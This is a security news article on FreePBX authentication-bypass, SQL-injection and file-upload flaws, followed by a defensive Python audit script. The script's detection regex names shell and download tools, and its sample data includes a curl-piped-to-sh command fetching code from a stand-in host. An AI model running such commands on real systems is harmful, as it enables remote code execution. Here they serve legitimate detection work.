FreePBX Vulnerabilities Enable Authentication Bypass That Leads to Remote Code Execution

FreePBX has addressed critical vulnerabilities enabling authentication bypass and remote code execution in its Endpoint Manager module. Discovered by Horizon3.ai researchers, these flaws affect telephony endpoint configurations in the open-source IP PBX system.

Researchers identified three high-severity issues distinct from the earlier CVE-2025-57819, which was added to CISA's Known Exploited Vulnerabilities catalog. CVE-2025-66039 allows authentication bypass when the "webserver" authorization type is enabled, permitting forged Basic Auth headers with a valid username and an arbitrary password to access protected endpoints.

This bypass chains with CVE-2025-61675, which covers multiple SQL injections across the basestation, firmware, model basefile, and custom extension endpoints, affecting 11 parameters and granting database read/write access. CVE-2025-61678 enables arbitrary file uploads via the firmware endpoint, allowing PHP webshell deployment for command execution.

FreePBX Administration

The vulnerabilities collectively enable unauthenticated attackers to execute arbitrary code on vulnerable instances, posing a significant risk to business communication infrastructure.

Checking exposure on Shodan for FreePBX

The first vulnerability, CVE-2025-66039, is an authentication bypass affecting FreePBX deployments configured with webserver-type authentication.

Attackers can forge an Authorization header with Basic HTTP authentication credentials, bypassing security checks that rely on Apache-level verification.

Detecting a FreePBX instance with an auth type webserver without an Authorization header

While this authentication type is not the default configuration, organizations using it remain severely exposed.

Horizon3.ai researchers discovered that by combining this bypass with the Endpoint Management module, attackers can exploit multiple SQL injection vulnerabilities (CVE-2025-61675).

Four unique endpoints and eleven parameters are affected, allowing attackers to read, modify, or delete database entries.

These SQL injections enable malicious actors to insert administrative users into the ampusers table or execute operating system commands through the cron_jobs table.

CVE ID         | Vulnerability Type         | Impact                  | Affected Versions
---------------|----------------------------|-------------------------|-----------------------------
CVE-2025-66039 | Authentication Bypass      | Remote Code Execution   | 16.x, 17.x (webserver auth)
CVE-2025-61675 | SQL Injection (Multiple)   | Data Exfiltration, RCE  | 16.x, 17.x (Endpoint Manager)
CVE-2025-61678 | Arbitrary File Upload      | Remote Code Execution   | 16.x, 17.x (firmware upload)

Arbitrary File Upload Enables Remote Code Execution

The third critical flaw, CVE-2025-61678, involves an arbitrary-file-upload vulnerability in the firmware upload functionality.

Authorization type webserver is not the default configuration of FreePBX

Because uploaded file paths are not properly validated, attackers can manipulate them to place PHP webshells on the server, resulting in unauthenticated remote code execution.

Horizon3.ai researchers successfully demonstrated uploading and executing a PHP shell that provided complete system access. FreePBX has released patches addressing all three vulnerabilities.

Organizations using versions 16.x or 17.x should update immediately to 16.0.92 and 17.0.6 to address SQL injection and file upload issues, and to 16.0.42 and 17.0.22 to address the authentication bypass.

Additionally, FreePBX removed the web server authentication option from the UI and now requires manual configuration via the command line, triggering dashboard warnings when enabled.

Horizon3.ai researchers recommend auditing FreePBX instances for suspicious database entries, unauthorized users in the ampusers table, and suspicious files in the /var/www/html directory.

Horizon3.ai advises organizations to avoid using web server authentication, which relies on legacy code and weaker security mechanisms.
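The audit Horizon3.ai recommends above (unexpected ampusers rows, command execution via cron_jobs, stray files under /var/www/html) can be scripted as an allowlist comparison. The following is an added example, not code from the article or from the FreePBX project; the admin allowlist, PHP baseline, column names and all sample inventory are constructed, and in practice you would feed it the output of your own database queries and a `find` over the web root.

```python
import re
from dataclasses import dataclass, field

# Constructed allowlist of the admin accounts you actually created.
KNOWN_ADMINS = {"admin", "pbxops"}

# Constructed baseline of PHP files from a known-good install (build it from
# a fresh install or the module packages, never from the host under review).
BASELINE_PHP = {
    "/var/www/html/index.php",
    "/var/www/html/admin/config.php",
}

# Shell interpreters, download tools and common staging tricks rarely belong
# in a FreePBX cron_jobs command; anything matching deserves a manual look.
SUSPICIOUS_CMD = re.compile(r"\b(bash|sh|curl|wget|nc|python|perl)\b|/dev/tcp|base64")

@dataclass
class Findings:
    unknown_users: list = field(default_factory=list)
    suspicious_cron: list = field(default_factory=list)
    unexpected_php: list = field(default_factory=list)

def audit(ampuser_names, cron_commands, php_files):
    """Compare the live inventory against the allowlists; return what does not belong."""
    f = Findings()
    f.unknown_users = sorted(set(ampuser_names) - KNOWN_ADMINS)
    f.suspicious_cron = [c for c in cron_commands if SUSPICIOUS_CMD.search(c)]
    f.unexpected_php = sorted(set(php_files) - BASELINE_PHP)
    return f

# Constructed sample inventory standing in for `SELECT username FROM ampusers`,
# the command column of cron_jobs, and `find /var/www/html -name '*.php'`.
SAMPLE_AMPUSERS = ["admin", "pbxops", "svc_backup"]
SAMPLE_CRON = [
    "/usr/bin/php /var/www/html/admin/modules/backup/bin/backup.php",
    "curl -s http://192.0.2.10/update | sh",
]
SAMPLE_PHP = sorted(BASELINE_PHP | {"/var/www/html/admin/assets/.cache.php"})

if __name__ == "__main__":
    result = audit(SAMPLE_AMPUSERS, SAMPLE_CRON, SAMPLE_PHP)
    for label, items in vars(result).items():
        print(f"{label}: {items or 'none'}")
```

A clean host yields empty lists for all three fields; any hit on a patched system is evidence to preserve before remediating, since the patch closes the door but does not remove what was already planted.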
